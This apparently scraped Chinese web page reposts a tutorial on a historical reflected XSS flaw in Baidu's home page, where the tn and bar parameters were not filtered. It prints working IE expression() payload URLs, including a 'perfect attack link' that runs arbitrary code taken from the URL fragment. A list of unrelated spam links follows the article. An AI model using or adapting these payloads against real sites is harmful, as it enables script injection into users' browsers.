当前位置: 首页 > news >正文

连江网站建设做一个公司网站流程 由ui设计

连江网站建设,做一个公司网站流程 由ui设计,上海新闻官网,制作网页图片格式拿百度主页曾经的一个XSS做个演示#xff0c;这个漏洞是由于百度主页tn和bar参数过滤不严导致的参数型XSS#xff1a;http://www.baidu.com/index.php?tn/**/stylexss:expression(alert(‘xss‘)); http://www.baidu.com/index.php?bar/**/stylexss:expressio…拿百度主页曾经的一个XSS做个演示这个漏洞是由于百度主页tn和bar参数过滤不严导致的参数型XSShttp://www.baidu.com/index.php?tn/**/stylexss:expression(alert(‘xss‘));  http://www.baidu.com/index.php?bar/**/stylexss:expression(alert(‘xss‘));  tn和bar两个参数对应在页面的输出是两个input表单值可以使用”(双引号)闭合表单值加入CSS属性跨站页面具体输出如下input typehidden nametn value/**/stylexss:expression(alert(‘xss‘));  这个漏洞只能在IE下使用FIREFOX会把URL链接参数中的”(双引号)转成编码%22,页面参数的输出也会变成%22,就不能闭合”(双引号)跨站。expression()是个不听话的角色这里可以用一个小技巧来去掉expression烦人的死循环。运行当前URL的#注释符后的代码  eval(unescape(location.hash.substr(1)))  给window对象的方法定义一个值判断这个值运行一次代码  (window.r!1)?eval(‘window.r1;eval(unescape(location.hash.substr(1)))‘):1  最后得到完美的攻击链接  http://www.baidu.com/index.php?bar/**/stylexss:expression((window.r!1)?eval(‘window.r1;eval(unescape(location.hash.substr(1)))‘):1);#alert%28%29  转载于:https://www.cnblogs.com/itchong/p/abcd9.html
http://www.yutouwan.com/news/129564/

相关文章:

  • asp网站 会员注册网站 建设 语言
  • 郑州市东区建设环保局官方网站怎么做网站效果图
  • 服装公司网站定位部门网站管理建设工作汇报
  • 项目管理网站开发wordpress 敏感词
  • 网站自己优化网站突然没收录了
  • 青海建设兵团网站小院福田小货车
  • 阜宁网站制作服务商景泰县做网站
  • 网站建设捌金手指花总十八深圳网站维护优化
  • 个人网站学生作业企业融资的目的和意义
  • 松江营销型网站建设公司国外免费网站服务器链接
  • 网页制作模板的网站代码最新手机发布会
  • 澄海建网站德州市平原县建设局网站
  • 书画网站的建设目标新乡宣传片制作公司
  • 门户网站的建设要求线上推广员
  • 大兴快速网站建设公司线上教学网站
  • 苏晋建设集团网站永久免费企业建站官网大全
  • frontpage2007网站建设网站的建站流程
  • 杭州网站制作公司网站海南省海口市网站建设
  • 交易网站模板福州帮人建网站公司
  • 网站改版提升总结免费ai写作网站
  • 西安做网站魔盒门店销售管理系统
  • 飞猪旅游的网站建设亿创电力建设集团有限公司网站
  • 药监局网站建设方案静态网站有什么用
  • 手机网站布局教程上海网站建设门户
  • 网上自己建网站app开发技术
  • 最新自助建站源码外网下载
  • wordpress站点字体修改京东自营入驻流程及费用
  • 连接器天津有公司做吗做新的网站seo
  • 免费的源代码分享有哪些网站图像放大网站
  • 如何自己学做网站网站建设落后发言